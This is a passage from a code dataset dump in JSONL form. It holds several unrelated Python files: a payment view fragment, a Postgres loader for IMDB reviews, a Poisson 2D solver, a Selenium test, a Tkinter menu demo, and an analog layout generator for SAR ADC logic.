номер дома и кв!\",\n \"mass\": order.total_mass,\n \"mail-category\": \"ORDINARY\",\n \"mail-type\": \"ONLINE_PARCEL\",\n \"order-num\": order.id\n }]\n\n url = protocol + host + path\n\n requests.put(url, headers=request_headers, data=json.dumps(new_orders))\n\n","sub_path":"payment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"167704443","text":"#table number 1 and 2 !!!!!!\n\nimport pandas as pd\nimport psycopg2\nimport datetime\nconnection = psycopg2.connect(user=\"postgres\", password=\"barmej\", host=\"127.0.0.1\", port=\"5432\", database=\"imdb_database\")\n\ncursor = connection.cursor()\n\ncursor.execute(\"SELECT label_name, label_id FROM label_types\")\nresult1 = cursor.fetchall()\nlabels = dict(result1)\nlabels\n\ndata = pd.read_csv('IMDB_Dataset.csv')\ndata.insert(0, 'id', range(1,1+len(data)))\ndata.insert(3, 'date', datetime.datetime.now().replace(microsecond=0))\n\ndata['sentiment']=[labels[x] for x in data['sentiment']]\n\nfor i,row in data.iterrows():\n\trow_ = tuple(row)\n\tsql1 = \"INSERT INTO data_input4 (id, input_data, input_date) VALUES (%s,%s,%s)\"\n\tcursor.execute(sql1, (row['id'],row['review'],datetime.datetime.now()))\n\tsql2 = \"INSERT INTO data_labeling5 (id_label, Label_number,Label_date) VALUES (%s,%s,%s)\"\n\tcursor.execute(sql2,(row['id'],row['sentiment'],datetime.datetime.now()))\n\tconnection.commit()\n","sub_path":"project_9_try11.py","file_name":"project_9_try11.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"90739882","text":"#!/usr/bin/env pyhton\n\nimport numpy as np\nimport poisson2D\nimport time\n\nimport matplotlib.pyplot as plt\n\nfilename = input('Nombre del archivo:')\nk = poisson2D.leeImagen(filename,0.01)\n\nax = 0.0\nbx = 1.0\nay = 0.0\nby = 1.0\nNx = k.shape[0]-2\nNy = 
k.shape[1]-2\nboundA = -1\nboundB = -1\nboundC = 1\nboundD = 1\n\n#k = np.ones([Nx+2,Ny+2])\n## Calcula Delta x y Delta y\nhx = (bx-ax)/(Nx+1)\nhy = (by-ay)/(Ny+1)\n\nht = 1\nr = ht / (hx*hy)\n\npoisson2D.ImprimeDatos(ax,bx,ay,by,Nx,Ny,hx,hy,\n boundA,\"Dirichlet\",\n boundB,\"Dirichlet\",\n boundC,\"Dirichlet\",\n boundD,\"Dirichlet\")\n\n## Definicion del sistema lineal de N+1 x N+1\nf = np.zeros((Ny,Nx)) # RHS\nA = poisson2D.Laplaciano2D(Nx, Ny,1,k) # Matriz del sistema\n\n## Aplicacion de las condiciones de frontera Dirichlet\n\nf[Ny-1,: ] = boundB # Top wall\nf[0 ,: ] = boundA # Bot wall\nf[: ,0 ] = boundC # Left wall\nf[: ,Nx-1] = boundD # Right wall\n\n\n## La solucion sera guardada en el arreglo u, que es de tamanio Ny+2 x Nx+2, pues incluye las fronteras\nu = np.zeros((Ny+2, Nx+2))\n\n## Se utiliza un algoritmo del paquete linalg para obtener la solucion del sistema de N x N\nut = np.copy(u[1:Ny+1,1:Nx+1])\nut.shape = ut.size # Cambiamos los arreglos a formato unidimensional\nf.shape = f.size # Cambiamos los arreglos a formato unidimensional\n\nt1_start = time.perf_counter()\nut = np.linalg.solve(A,f)\nt1_stop = time.perf_counter()\nprint(time.ctime(), '\\n CPU time: {:0.6f} '.format(t1_stop-t1_start))\n\n## Los valores en los lados del dominio son conocidos debido a las cond. 
Dirichlet\nu[Ny+1,: ] = boundB # Top wall\nu[0 ,: ] = boundA # Bot wall\nu[: ,0 ] = boundC # Left wall\nu[: ,Nx+1] = boundD # Right wall\n\npoisson2D.ImprimeSistema(A,ut,f)\n\nut.shape = (Ny, Nx) # Regresamos el arreglo a formato bidimensional\nu[1:Ny+1,1:Nx+1] = ut\n\nx = np.linspace(ax,bx,Nx+2)\ny = np.linspace(ay,by,Ny+2)\nxg, yg = np.meshgrid(x,y)\n\npoisson2D.GuardaSolucion('imagenX', x, y, k)\n\nplt.imshow(u,cmap='inferno')\nplt.show()\n\n#poisson2D.GuardaSolucion('SALIDA', x, y, u)\n\n# Post-procesamiento ...\nNNX = u.shape[0]\nunew = np.copy(u)\nfor j in range(u.shape[0]):\n for i in range(u.shape[1]):\n unew[i,j] = u[NNX-i-1,j]\n\npoisson2D.GraficaSuperficieC(xg,yg,unew,'inferno') #hot, cool, rainbow, ...\n\n","sub_path":"TEST/2D_K_Variable_01.py","file_name":"2D_K_Variable_01.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"634470698","text":"# Import unittest module for creating unit tests\nimport unittest\n\n# Import time module to implement \nimport time\n\n# Import the Selenium 2 module (aka \"webdriver\")\nfrom selenium import webdriver\n\n# For automating data input\nfrom selenium.webdriver.common.keys import Keys\n\n# For providing custom configurations for Chrome to run\nfrom selenium.webdriver.chrome.options import Options\n\n\n# --------------------------------------\n# Provide a class for the unit test case\nclass PythonOrgSearchChrome(unittest.TestCase):\n\n\t# Anything declared in setUp will be executed for all test cases\n\tdef setUp(self):\n\t\t# Select which device you want to emulate by uncommenting it\n\t\t# More information at: https://sites.google.com/a/chromium.org/chromedriver/mobile-emulation\n\t\tmobile_emulation = { \n\t\t\t\"deviceName\": \"Nexus 5\"\n\t\t\t\n\t\t\t# Or specify a specific build using the following two arguments\n\t\t\t#\"deviceMetrics\": { \"width\": 360, \"height\": 640, \"pixelRatio\": 3.0 },\n\t\t 
#\"userAgent\": \"Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19\" }\n\t\t}\n\t\t\n\t\t# Define a variable to hold all the configurations we want\n\t\tchrome_options = webdriver.ChromeOptions()\n\t\t\n\t\t# Add the mobile emulation to the chrome options variable\n\t\tchrome_options.add_experimental_option(\"mobileEmulation\", mobile_emulation)\n\t\tchrome_options.add_argument('--headless')\n\n\t\t# Create driver, pass it the path to the chromedriver file and the special configurations you want to run\n\t\tself.driver = webdriver.Chrome(executable_path='/usr/local/bin/chromedriver', chrome_options=chrome_options)\n\n\t# An individual test case. Must start with 'test_' (as per unittest module)\n\tdef test_search_in_python_chrome(self):\t\n\t\t# Assigning a local variable for the global driver\n\t\tdriver = self.driver\n\n\t\t# Go to google.com\n\n\t\tdriver.get('http://localhost:8080')\n\t\tdriver.implicitly_wait(30)\n\t\ttext = driver.find_element_by_id(\"sample-item\").text\n\t\t\n\t\tprint(\"Text:\",text)\n\t\tself.assertEqual(\"text in the item\", text)\n\n\n\t\t# Take a screenshot of the results\n\t# Anything declared in tearDown will be executed for all test cases\n\tdef tearDown(self):\n\t\t# Close the browser. \n\t\t# Note close() will close the current tab, if its the last tab it will close the browser. 
To close the browser entirely use quit()\n\t\tself.driver.close()\n\n# Boilerplate code to start the unit tests\nif __name__ == \"__main__\":\n\tunittest.main()\n","sub_path":"seltest.py","file_name":"seltest.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"502487829","text":"from tkinter import *\r\n\r\ndef doSome():\r\n print('wyświetlam tekst')\r\n\r\ndef doSome2():\r\n print('To jest druga funckcja')\r\n \r\nroot = Tk()\r\nroot.geometry('300x200')\r\n\r\n# -- MAIN MENU\r\n\r\nmenu_main = Menu(root)\r\n\r\nroot.config(menu=menu_main)\r\n\r\nsubmenu = Menu(menu_main)\r\neditmenu = Menu(menu_main)\r\n\r\n# -- dodanie menu\r\nmenu_main.add_cascade(label='File', menu=submenu)\r\nmenu_main.add_cascade(label='Edit', menu=editmenu)\r\n\r\nsubmenu.add_command(label='New project', command=doSome)\r\nsubmenu.add_command(label='New...', command=doSome2)\r\nsubmenu.add_separator()\r\nsubmenu.add_command(label='Exit', command=root.quit)\r\n\r\neditmenu.add_command(label='Redo', command=doSome)\r\n\r\n# -- TOOLBAR\r\n\r\ntoolbar = Frame(root, bg='yellow')\r\ntool_btn = Button(toolbar, text='Insert image', command=doSome)\r\ntool_print_btn = Button(toolbar, text='Print', command=doSome)\r\n\r\ntool_btn.pack(side=LEFT, padx=2, pady=2)\r\ntool_print_btn.pack(side=LEFT, padx=2, pady=2)\r\ntoolbar.pack(side=TOP, fill=X)\r\n\r\n# -- STATUS\r\n\r\nstatusbar = Label(root, text='Prepare', bd=1, relief=SUNKEN, anchor=W)\r\n\r\n\r\nstatusbar.pack(side=BOTTOM, fill=X)\r\n\r\n\r\n\r\nroot.mainloop()","sub_path":"Python_projekty_windows/Tkinter-gui/newgui.py","file_name":"newgui.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"256926159","text":"#!/usr/bin/python\n########################################################################################################################\n#\n# 
Copyright (c) 2014, Regents of the University of California\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the\n# following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following\n# disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the\n# following disclaimer in the documentation and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n########################################################################################################################\n\n\"\"\"ADC library\n\"\"\"\nimport laygo\nimport numpy as np\nimport os\n#import logging;logging.basicConfig(level=logging.DEBUG)\n\ndef create_power_pin_from_inst(laygen, layer, gridname, inst_left, inst_right):\n \"\"\"create power pin\"\"\"\n rvdd0_pin_xy = laygen.get_inst_pin_coord(inst_left.name, 'VDD', gridname, sort=True)\n rvdd1_pin_xy = laygen.get_inst_pin_coord(inst_right.name, 'VDD', gridname, sort=True)\n rvss0_pin_xy = laygen.get_inst_pin_coord(inst_left.name, 'VSS', gridname, 
sort=True)\n rvss1_pin_xy = laygen.get_inst_pin_coord(inst_right.name, 'VSS', gridname, sort=True)\n\n laygen.pin(name='VDD', layer=layer, xy=np.vstack((rvdd0_pin_xy[0],rvdd1_pin_xy[1])), gridname=gridname)\n laygen.pin(name='VSS', layer=layer, xy=np.vstack((rvss0_pin_xy[0],rvss1_pin_xy[1])), gridname=gridname)\n\ndef generate_sarlogic(laygen, objectname_pfix, templib_logic, placement_grid, routing_grid_m3m4, m=1, origin=np.array([0, 0])):\n \"\"\"generate sar logic \"\"\"\n pg = placement_grid\n rg_m3m4 = routing_grid_m3m4\n\n #inv_name = 'inv_' + str(m) + 'x'\n #oai22_name = 'oai22_' + str(m) + 'x'\n #mux2to1_name = 'mux2to1_' + str(m) + 'x'\n #nand_name = 'nand_' + str(m) + 'x'\n inv_name = 'inv_1x'\n oai22_name = 'oai22_1x'\n mux2to1_name = 'mux2to1_1x'\n nand_name = 'nand_1x'\n inv_obuf_name = 'inv_' + str(m) + 'x'\n\n # placement\n isaopb0 = laygen.place(name = \"I\" + objectname_pfix + 'INV0', templatename = inv_name,\n gridname = pg, xy=origin, template_libname=templib_logic)\n isaomb0 = laygen.relplace(name=\"I\" + objectname_pfix + 'INV1', templatename=inv_name,\n gridname=pg, refinstname=isaopb0.name, template_libname=templib_logic)\n ioai0 = laygen.relplace(name = \"I\" + objectname_pfix + 'OAI0', templatename = oai22_name,\n gridname = pg, refinstname = isaomb0.name, template_libname=templib_logic)\n ildpo0 = laygen.relplace(name=\"I\" + objectname_pfix + 'INV2', templatename=inv_name,\n gridname=pg, refinstname=ioai0.name, template_libname=templib_logic)\n ioai1 = laygen.relplace(name = \"I\" + objectname_pfix + 'OAI1', templatename = oai22_name,\n gridname = pg, refinstname = ildpo0.name, template_libname=templib_logic)\n ildno0 = laygen.relplace(name=\"I\" + objectname_pfix + 'INV3', templatename=inv_name,\n gridname=pg, refinstname=ioai1.name, template_libname=templib_logic)\n ind0 = laygen.relplace(name=\"I\" + objectname_pfix + 'ND0', templatename=nand_name,\n gridname=pg, refinstname=ildno0.name, template_libname=templib_logic)\n imuxen0 = 
laygen.relplace(name=\"I\" + objectname_pfix + 'MUXEN0', templatename=inv_name,\n gridname=pg, refinstname=ind0.name, template_libname=templib_logic)\n imux0 = laygen.relplace(name=\"I\" + objectname_pfix + 'MUX0', templatename=mux2to1_name,\n gridname=pg, refinstname=imuxen0.name, template_libname=templib_logic)\n izp0 = laygen.relplace(name=\"I\" + objectname_pfix + 'OBUF0', templatename=inv_obuf_name,\n gridname=pg, refinstname=imux0.name, template_libname=templib_logic)\n imux1 = laygen.relplace(name=\"I\" + objectname_pfix + 'MUX1', templatename=mux2to1_name,\n gridname=pg, refinstname=izp0.name, template_libname=templib_logic)\n izm0 = laygen.relplace(name=\"I\" + objectname_pfix + 'OBUF1', templatename=inv_obuf_name,\n gridname=pg, refinstname=imux1.name, template_libname=templib_logic)\n imux2 = laygen.relplace(name=\"I\" + objectname_pfix + 'MUX2', templatename=mux2to1_name,\n gridname=pg, refinstname=izm0.name, template_libname=templib_logic)\n izmid0 = laygen.relplace(name=\"I\" + objectname_pfix + 'OBUF2', templatename=inv_obuf_name,\n gridname=pg, refinstname=imux2.name, template_libname=templib_logic)\n\n # internal pins\n isaopb0_i_xy = laygen.get_inst_pin_coord(isaopb0.name, 'I', rg_m3m4)\n isaopb0_o_xy = laygen.get_inst_pin_coord(isaopb0.name, 'O', rg_m3m4)\n isaomb0_i_xy = laygen.get_inst_pin_coord(isaomb0.name, 'I', rg_m3m4)\n isaomb0_o_xy = laygen.get_inst_pin_coord(isaomb0.name, 'O', rg_m3m4)\n ioai0_a_xy = laygen.get_inst_pin_coord(ioai0.name, 'A', rg_m3m4)\n ioai0_b_xy = laygen.get_inst_pin_coord(ioai0.name, 'B', rg_m3m4)\n ioai0_c_xy = laygen.get_inst_pin_coord(ioai0.name, 'C', rg_m3m4)\n ioai0_d_xy = laygen.get_inst_pin_coord(ioai0.name, 'D', rg_m3m4)\n ioai0_o_xy = laygen.get_inst_pin_coord(ioai0.name, 'O', rg_m3m4)\n ildpo0_i_xy = laygen.get_inst_pin_coord(ildpo0.name, 'I', rg_m3m4)\n ildpo0_o_xy = laygen.get_inst_pin_coord(ildpo0.name, 'O', rg_m3m4)\n ioai1_a_xy = laygen.get_inst_pin_coord(ioai1.name, 'A', rg_m3m4)\n ioai1_b_xy = 
laygen.get_inst_pin_coord(ioai1.name, 'B', rg_m3m4)\n ioai1_c_xy = laygen.get_inst_pin_coord(ioai1.name, 'C', rg_m3m4)\n ioai1_d_xy = laygen.get_inst_pin_coord(ioai1.name, 'D', rg_m3m4)\n ioai1_o_xy = laygen.get_inst_pin_coord(ioai1.name, 'O', rg_m3m4)\n ildno0_i_xy = laygen.get_inst_pin_coord(ildno0.name, 'I', rg_m3m4)\n ildno0_o_xy = laygen.get_inst_pin_coord(ildno0.name, 'O', rg_m3m4)\n ind0_a_xy = laygen.get_inst_pin_coord(ind0.name, 'A', rg_m3m4)\n ind0_b_xy = laygen.get_inst_pin_coord(ind0.name, 'B', rg_m3m4)\n ind0_o_xy = laygen.get_inst_pin_coord(ind0.name, 'O', rg_m3m4)\n imux0_i0_xy = laygen.get_inst_pin_coord(imux0.name, 'I0', rg_m3m4)\n imux0_i1_xy = laygen.get_inst_pin_coord(imux0.name, 'I1', rg_m3m4)\n imux0_en0_xy = laygen.get_inst_pin_coord(imux0.name, 'EN0', rg_m3m4)\n imux0_en1_xy = laygen.get_inst_pin_coord(imux0.name, 'EN1', rg_m3m4)\n imux0_o_xy = laygen.get_inst_pin_coord(imux0.name, 'O', rg_m3m4)\n imuxen0_i_xy = laygen.get_inst_pin_coord(imuxen0.name, 'I', rg_m3m4)\n imuxen0_o_xy = laygen.get_inst_pin_coord(imuxen0.name, 'O', rg_m3m4)\n imux1_i0_xy = laygen.get_inst_pin_coord(imux1.name, 'I0', rg_m3m4)\n imux1_i1_xy = laygen.get_inst_pin_coord(imux1.name, 'I1', rg_m3m4)\n imux1_en0_xy = laygen.get_inst_pin_coord(imux1.name, 'EN0', rg_m3m4)\n imux1_en1_xy = laygen.get_inst_pin_coord(imux1.name, 'EN1', rg_m3m4)\n imux1_o_xy = laygen.get_inst_pin_coord(imux1.name, 'O', rg_m3m4)\n imux2_i0_xy = laygen.get_inst_pin_coord(imux2.name, 'I0', rg_m3m4)\n imux2_i1_xy = laygen.get_inst_pin_coord(imux2.name, 'I1', rg_m3m4)\n imux2_en0_xy = laygen.get_inst_pin_coord(imux2.name, 'EN0', rg_m3m4)\n imux2_en1_xy = laygen.get_inst_pin_coord(imux2.name, 'EN1', rg_m3m4)\n imux2_o_xy = laygen.get_inst_pin_coord(imux2.name, 'O', rg_m3m4)\n izp0_i_xy = laygen.get_inst_pin_coord(izp0.name, 'I', rg_m3m4)\n izp0_o_xy = laygen.get_inst_pin_coord(izp0.name, 'O', rg_m3m4)\n izm0_i_xy = laygen.get_inst_pin_coord(izm0.name, 'I', rg_m3m4)\n izm0_o_xy = 
laygen.get_inst_pin_coord(izm0.name, 'O', rg_m3m4)\n izmid0_i_xy = laygen.get_inst_pin_coord(izmid0.name, 'I', rg_m3m4)\n izmid0_o_xy = laygen.get_inst_pin_coord(izmid0.name, 'O', rg_m3m4)\n\n #reference route coordinate\n y0 = isaopb0_i_xy[0][1]\n x0 = laygen.get_inst_xy(name=isaopb0.name, gridname=rg_m3m4)[0] + 1\n x1 = laygen.get_inst_xy(name=izmid0.name, gridname=rg_m3m4)[0]\\\n +laygen.get_template_size(name=izmid0.cellname, gridname=rg_m3m4, libname=templib_logic)[0] - 1\n #saopb/saomb\n rsaopbv0, rsaopb0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], isaopb0_i_xy[0], np.array([x0, y0 + 3]), rg_m3m4)\n rsaombv0, rsaomb0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], isaomb0_i_xy[0], np.array([x0, y0 + 4]), rg_m3m4)\n #vplus/vminus\n [rv0, rvplus0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], isaopb0_o_xy[0], ioai0_c_xy[0], y0 - 0, rg_m3m4)\n [rv0, rvminus0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], isaomb0_o_xy[0], ioai1_c_xy[0], y0 + 1, rg_m3m4)\n #rst/sb\n rrstv0, rrst0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], ioai0_b_xy[0], np.array([x0, y0 - 2]), rg_m3m4)\n rv0, rsb0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], ioai0_d_xy[0], np.array([x0, y0 - 1+6]), rg_m3m4)\n rrstv1, rrst1 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], ioai1_b_xy[0], np.array([x0, y0 - 2]), rg_m3m4)\n [rv0, rsb1, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ioai1_d_xy[0], ioai0_d_xy[0], y0 - 1, rg_m3m4)\n #ldpo\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ioai0_o_xy[0], ildpo0_i_xy[0], y0 + 0 - 3, rg_m3m4, extendl=3, extendr=1)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ildpo0_o_xy[0], ioai0_a_xy[0], y0 - 4, rg_m3m4)\n [rv0, rh0, rv1] = 
laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ildpo0_o_xy[0], imux0_i0_xy[0], y0 - 4, rg_m3m4)\n #ldno\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ioai1_o_xy[0], ildno0_i_xy[0], y0 + 0, rg_m3m4, extendl=2, extendr=2)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ildno0_o_xy[0], ioai1_a_xy[0], y0 - 3, rg_m3m4)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ildno0_o_xy[0], imux1_i0_xy[0], y0 - 3, rg_m3m4)\n #nand input\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ildpo0_o_xy[0], ind0_b_xy[0], y0 - 4, rg_m3m4)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ildno0_o_xy[0], ind0_a_xy[0], y0 - 3, rg_m3m4)\n #nand output(ldndo)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ind0_o_xy[0], imux2_i0_xy[0], y0 - 1, rg_m3m4)\n #mux en\n rextselv0, rextsel0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], imuxen0_i_xy[0], np.array([x0, y0 + 2]), rg_m3m4)\n rv0, rh0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], imux0_en1_xy[0], np.array([x0, y0 + 2]), rg_m3m4)\n rv0, rh0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], imux1_en1_xy[0], np.array([x0, y0 + 2]), rg_m3m4)\n rv0, rh0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], imux2_en1_xy[0], np.array([x0, y0 + 2]), rg_m3m4)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], imuxen0_o_xy[0], imux0_en0_xy[0], y0 + 1, rg_m3m4)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], imuxen0_o_xy[0], imux1_en0_xy[0], y0 + 1, rg_m3m4)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], imuxen0_o_xy[0], imux2_en0_xy[0], y0 + 1, rg_m3m4)\n 
#mux ext\n rv0, rext_zpb0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], imux0_i1_xy[0], np.array([imux0_i1_xy[0][0]-4, y0 + 0]), rg_m3m4)\n rv0, rext_zmb0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], imux1_i1_xy[0], np.array([imux1_i1_xy[0][0]-4, y0 + 0]), rg_m3m4)\n rv0, rext_zmidb0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], imux2_i1_xy[0], np.array([imux2_i1_xy[0][0]-4, y0 + 0]), rg_m3m4)\n #mux output\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], imux0_o_xy[0], izp0_i_xy[0], y0 + 0, rg_m3m4)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], imux1_o_xy[0], izm0_i_xy[0], y0 + 0, rg_m3m4)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], imux2_o_xy[0], izmid0_i_xy[0], y0 + 0, rg_m3m4)\n #final output\n rv0, rzp0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], izp0_o_xy[0], np.array([x1, y0 - 4]), rg_m3m4)\n rv0, rzm0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], izm0_o_xy[0], np.array([x1, y0 - 3]), rg_m3m4)\n rv0, rzmid0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], izmid0_o_xy[0], np.array([x1, y0 - 1]), rg_m3m4)\n \n #pins \n laygen.create_boundary_pin_form_rect(rsaopb0, rg_m3m4, \"SAOPB\", laygen.layers['pin'][4], size=6, direction='left')\n laygen.pin_from_rect('SAOPB2', laygen.layers['pin'][3], rsaopbv0, gridname=rg_m3m4, netname='SAOPB')\n laygen.create_boundary_pin_form_rect(rsaomb0, rg_m3m4, \"SAOMB\", laygen.layers['pin'][4], size=6, direction='left')\n laygen.pin_from_rect('SAOMB2', laygen.layers['pin'][3], rsaombv0, gridname=rg_m3m4, netname='SAOMB')\n laygen.create_boundary_pin_form_rect(rsb0, rg_m3m4, \"SB\", laygen.layers['pin'][4], size=6, direction='left')\n laygen.create_boundary_pin_form_rect(rrst0, rg_m3m4, \"RST\", laygen.layers['pin'][4], size=6, 
direction='left')\n #laygen.pin_from_rect('RST2', laygen.layers['pin'][3], rrstv0, gridname=rg_m3m4, netname='RST')\n laygen.pin_from_rect('RST2', laygen.layers['pin'][3], rrstv1, gridname=rg_m3m4, netname='RST')\n laygen.create_boundary_pin_form_rect(rextsel0, rg_m3m4, \"EXTSEL\", laygen.layers['pin'][4], size=6, direction='left')\n laygen.pin_from_rect('EXTSEL2', laygen.layers['pin'][3], rextselv0, gridname=rg_m3m4, netname='EXTSEL')\n laygen.create_boundary_pin_form_rect(rext_zpb0, rg_m3m4, \"EXT_ZPB\", laygen.layers['pin'][4], size=4, direction='left')\n laygen.create_boundary_pin_form_rect(rext_zmb0, rg_m3m4, \"EXT_ZMB\", laygen.layers['pin'][4], size=4, direction='left')\n laygen.create_boundary_pin_form_rect(rext_zmidb0, rg_m3m4, \"EXT_ZMIDB\", laygen.layers['pin'][4], size=4, direction='left')\n laygen.create_boundary_pin_form_rect(rzp0, rg_m3m4, \"ZP\", laygen.layers['pin'][4], size=6, direction='right')\n laygen.create_boundary_pin_form_rect(rzm0, rg_m3m4, \"ZM\", laygen.layers['pin'][4], size=6, direction='right')\n laygen.create_boundary_pin_form_rect(rzmid0, rg_m3m4, \"ZMID\", laygen.layers['pin'][4], size=6, direction='right')\n\n # power pin\n create_power_pin_from_inst(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, inst_left=isaopb0, inst_right=izmid0)\n\nif __name__ == '__main__':\n laygen = laygo.GridLayoutGenerator(config_file=\"laygo_config.yaml\")\n\n import imp\n try:\n imp.find_module('bag')\n laygen.use_phantom = False\n except ImportError:\n laygen.use_phantom = True\n\n tech=laygen.tech\n utemplib = tech+'_microtemplates_dense'\n logictemplib = tech+'_logic_templates'\n laygen.load_template(filename=tech+'_microtemplates_dense_templates.yaml', libname=utemplib)\n laygen.load_grid(filename=tech+'_microtemplates_dense_grids.yaml', libname=utemplib)\n laygen.load_template(filename=logictemplib+'.yaml', libname=logictemplib)\n laygen.templates.sel_library(utemplib)\n laygen.grids.sel_library(utemplib)\n\n # library load or 
generation\n workinglib = 'adc_sar_generated'\n laygen.add_library(workinglib)\n laygen.sel_library(workinglib)\n if os.path.exists(workinglib + '.yaml'): # generated layout file exists\n laygen.load_template(filename=workinglib + '.yaml', libname=workinglib)\n laygen.templates.sel_library(utemplib)\n\n #grid\n pg = 'placement_basic' #placement grid\n rg_m1m2 = 'route_M1_M2_cmos'\n rg_m1m2_thick = 'route_M1_M2_thick'\n rg_m2m3 = 'route_M2_M3_cmos'\n rg_m2m3_thick = 'route_M2_M3_thick'\n rg_m3m4 = 'route_M3_M4_basic'\n rg_m4m5 = 'route_M4_M5_basic'\n rg_m5m6 = 'route_M5_M6_basic'\n rg_m1m2_pin = 'route_M1_M2_basic'\n rg_m2m3_pin = 'route_M2_M3_basic'\n\n #display\n #laygen.display()\n #laygen.templates.display()\n #laygen.save_template(filename=workinglib+'_templates.yaml', libname=workinglib)\n\n mycell_list = []\n #sarlogic generation\n m=1\n cellname='sarlogic'\n print(cellname+\" generating\")\n mycell_list.append(cellname)\n laygen.add_cell(cellname)\n laygen.sel_cell(cellname)\n generate_sarlogic(laygen, objectname_pfix='SL0', templib_logic=logictemplib,\n placement_grid=pg, routing_grid_m3m4=rg_m3m4, m=m, origin=np.array([0, 0]))\n laygen.add_template_from_cell()\n\n\n laygen.save_template(filename=workinglib+'.yaml', libname=workinglib)\n #bag export, if bag does not exist, gds export\n import imp\n try:\n imp.find_module('bag')\n import bag\n prj = bag.BagProject()\n for mycell in mycell_list:\n laygen.sel_cell(mycell)\n laygen.export_BAG(prj, array_delimiter=['[', ']'])\n except ImportError:\n laygen.export_GDS('output.gds', cellname=mycell_list, layermapfile=tech+\".layermap\") # change layermapfile\n","sub_path":"generators/adc_sar_sarlogic_layout_generator_bak160128.py","file_name":"adc_sar_sarlogic_layout_generator_bak160128.py","file_ext":"py","file_size_in_byte":18414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"642291006","text":"import ipopt\nimport probInfo as prob\nfrom problemData 
